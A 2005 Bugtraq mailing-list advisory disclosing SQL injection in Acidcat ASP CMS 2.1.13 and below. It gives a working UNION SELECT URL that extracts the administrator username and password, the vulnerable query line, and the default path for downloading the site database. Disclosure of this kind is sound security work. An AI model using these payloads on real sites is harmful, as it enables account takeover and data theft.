[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20051220170334.62262.qmail@web33207.mail.mud.yahoo.com>
Date: Tue, 20 Dec 2005 09:03:34 -0800 (PST)
From: h e <het_ebadi@...oo.com>
To: bugtraq@...urityfocus.com
Subject: Acidcat ASP CMS Multiple Vulnerabilities
http://hamid.ir
Acidcat CMS is a web site and simple content
management system that can be administered via a web
browser.
It is free for non-commercial use.Acidcat CMS is also
an open source product.
The product has been found to contain multiple
security vulnerabilities allowing a remote attacker to
find administrator username and password.
Acidcat ASP CMS :http://www.acidcat.com
Credit:
The information has been provided by Hamid Ebadi
(Hamid Network Security Team):admin@...id.ir.
The original article can be found at:
http://hamid.ir/security/
Vulnerable Systems:
* Acidcat CMS v 2.1.13 and below
Example :
The following URL can be used to trigger an SQL
injection vulnerability in the main_content.asp page:
http://localhost/acidcat/default.asp?ID=1'
Microsoft OLE DB Provider for ODBC Drivers error
'80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error
(missing operator) in query expression 'ID = 1'''.
/main_content.asp, line 16
Vulnerable Code:
The following lines in main_content.asp
Item.Source = "SELECT * FROM Item WHERE ID = "+
Item__MMColParam.replace(/'/g, "''") + "";
Exploit:
The following URL will illustrate how you can easily
find administrator username and password by entering
the following URL:
http://localhost/acidcat/default.asp?ID=26 union
select 1,username,3,password,5,6 from Configuration
The base path of the login is :
http://localhost/acidcat/main_login.asp
Database Download:
The database can be downloaded over the web (default
installation).it can be found on
http://localhost/acidcat/databases/acidcat.mdb
Signature
__________________________________________________
Do You Yahoo!?
Tired of spam? Yahoo! Mail has the best spam protection around
http://mail.yahoo.com
Powered by blists - more mailing lists